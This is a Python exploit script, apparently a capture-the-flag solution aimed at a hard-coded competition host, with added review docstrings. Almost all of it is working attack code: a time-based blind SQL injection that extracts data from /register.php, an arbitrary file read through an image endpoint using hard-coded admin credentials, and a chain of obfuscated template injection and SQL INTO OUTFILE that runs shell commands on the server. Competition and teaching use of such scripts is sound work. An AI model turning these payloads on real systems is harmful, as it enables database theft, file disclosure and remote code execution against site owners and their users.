import sys
import re
import time
import requests
import random
import string as s1

# Browser-like User-Agent sent with every request; it is the only header set.
_USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'
headers = {'User-Agent': _USER_AGENT}

def random_str(len: int) -> str:
    """Return a string of *len* pseudo-random ASCII lowercase letters.

    Draws from ``random`` (not ``secrets``), so the result is not
    cryptographically unpredictable. Note the parameter shadows the
    builtin ``len`` inside this body.
    """
    return ''.join(random.choices(s1.ascii_lowercase, k=len))

# Candidate alphabet for sql_exp, tried in this order at every character
# position: lowercase letters in keyboard order, digits, then '/'.
# This name shadows the stdlib module `string`, which is why the import
# at the top is aliased as `s1`.
string = "qwertyuiopasdfghjklzxcvbnm1234567890/"
# Not read anywhere in this file.
num = 1
def sql_exp(url: str) -> bool:
    """Time-based blind SQL injection probe against ``/register.php``.

    For each character position ``i`` in 1..59 and each candidate ``j`` in
    the module-level ``string``, sends one GET whose ``username`` parameter
    carries a conditional ``!sleep(3)``. A round trip longer than 3 s is
    taken as "the condition held" and ``j`` is appended to ``payload``,
    which is printed as it grows.

    Args:
        url: base URL of the target (scheme, host and port); the request
            path is appended with its own leading slash.

    Returns:
        ``False`` if any exception escapes the loop, otherwise ``True``.
        The recovered text is only printed, never returned.

    Review notes:
        - ``payload2`` is rebuilt on every iteration but never sent; only
          ``payload1`` (the ``information_schema.processlist`` query) goes out.
        - ``except Exception`` returns ``False`` without logging, so a
          network failure is indistinguishable from an early exit.
        - The 3 s threshold equals the injected sleep, so network jitter
          alone can produce false positives; that same stall is also what
          a server-side latency monitor would observe.
        - The module-level ``num`` is not used here.
    """
    payload = ""
    try:
        for i in range(1,60):
            for j in string:
                # Character i of the Info column of the first processlist row, compared with j.
                payload1 = url+"/register.php?password=1&username=admin'%0dand%0dif(mid((select%0dInfo%0dfrom%0dinformation_schema.processlist%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),!sleep(3),1)%0dand%0d\'1'
                # Same shape against a different table/column; built but never requested.
                payload2 = url+"/register.php?password=1&username=admin'%0dand%0dif(mid((select%0dqwbqwbqwbpass%0dfrom%0dqwbtttaaab111e%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),!sleep(3),1)%0dand%0d\'1'
                time1 = time.time()
                #print(url)
                res = requests.get(payload1,headers=headers)
                #print(url+"/index.php?id=1'%0dand%0dif(mid((select%0dInfo%0dfrom%0dinformation_schema.processlist%0dlimit%0d0,1)," + str(i) + ',1)%0din%0d(\'' + j + '\'),sleep(1),0)%0dand%0d\'1')
                time2 = time.time()
                # Bare marker that the response body mentions 'error'; nothing else is done with it.
                if 'error' in res.text:
                    print(1)
                #print(time2-time1)
                #print(res.text)
                # Wall-clock round trip, including network time.
                intval1 = (time2 - time1)
                # Over 3 s means the sleep fired, i.e. j matched at position i.
                if intval1 > 3:
                    payload += j
                    print(payload)
                    # Redundant: this is already the last statement of the loop body.
                    continue
    except Exception as e:
            # Swallows the error (including e) and reports failure without logging.
            return False

    return True

## we111c000me_to_qwb


def download_file(url: str) -> None:
    """Log in as admin and fetch a server-side file through ``/qwbimage.php``.

    ``qwb_image_name`` is given an absolute filesystem path (a compiled
    ``app.cpython-35.pyc``), so the endpoint is used as an arbitrary file
    read rather than an image lookup. The admin credentials are passed in
    the query string of a GET to ``/login.php`` on a ``requests.Session`` so
    that any cookie set by the login is reused for the second request. The
    raw response body is printed; nothing is returned or written to disk.

    Args:
        url: base URL of the target (scheme, host and port).
    """
    payload = url+"/qwbimage.php?qwb_image_name=/qwb/app/__pycache__/app.cpython-35.pyc"
    s = requests.session()
    # Credentials travel in the URL of a GET, so they land in access logs and history.
    s.get(url+"/login.php?username=admin&password=we111c000me_to_qwb")
    res = s.get(payload)
    # Binary content (a .pyc), printed as a bytes literal.
    print(res.content)

def get_shell(url: str) -> None:
    """Three-request chain: store a template expression via registration,
    write it to a file with SQL ``INTO OUTFILE``, then have the template
    engine include that file.

    1. GET ``/register.php`` with ``username`` set to a ``{{ ... }}``
       expression that imports a module and runs a command; module name and
       command are supplied as integers and decoded with ``bytes.fromhex``.
    2. GET ``/register.php`` again with ``username=1' or 1 into outfile
       '/var/lib/mysql-files/<random name>'``, which makes the database
       write query results (presumably including the row from step 1 — not
       verifiable from here) to that path.
    3. Log in as admin (credentials in the query string, on a session) and
       request ``/good_job_my_ctfer.php`` with ``congratulations`` set to
       ``{% extends <that file> %}`` so the server renders the written file
       as a template. The response text is printed; nothing is returned.

    Args:
        url: base URL of the target (scheme, host and port).
    """
    # Random 6-letter name for the outfile, so repeated runs do not collide.
    file_name = random_str(6)
    register_payload = url+"/register.php?password=1&username=%7b%7b__import__(bytes.fromhex(str(hex(28531))[2:]).decode()).popen(bytes.fromhex(str(hex(159698592644438093083295786740770931105195540868394758120956263))[2:]).decode()).read()%7d%7d" # 27763 needs to be changed; currently it is ls
    requests.get(register_payload)
    # Unquoted single quote in the username breaks out of the SQL string literal.
    upload_file_payload = url+"/register.php?password=1&username=1' or 1 into outfile '/var/lib/mysql-files/" + file_name
    requests.get(upload_file_payload)
    s = requests.session()
    s.get(url+"/login.php?username=admin&password=we111c000me_to_qwb")
    # %25 is a literal '%', giving the template engine a `{% extends ... %}` tag.
    res = s.get(url+"/good_job_my_ctfer.php?congratulations={%25extends /var/lib/mysql-files/" + file_name + "%25}")
    print(res.text)


if __name__ == '__main__':
    # Command-line host/port parsing is left disabled; the target is hard-coded.
    #host=sys.argv[1]
    #port=sys.argv[2]
    host = "eci-2zeajgj31n7b8l35nf6g.cloudeci1.ichunqiu.com"
    port = 8888
    url = "http://{}:{}".format(host, port)
    # Earlier stages stay commented out; only the final stage runs.
    #sql_exp(url)
    #download_file(url)
    get_shell(url)
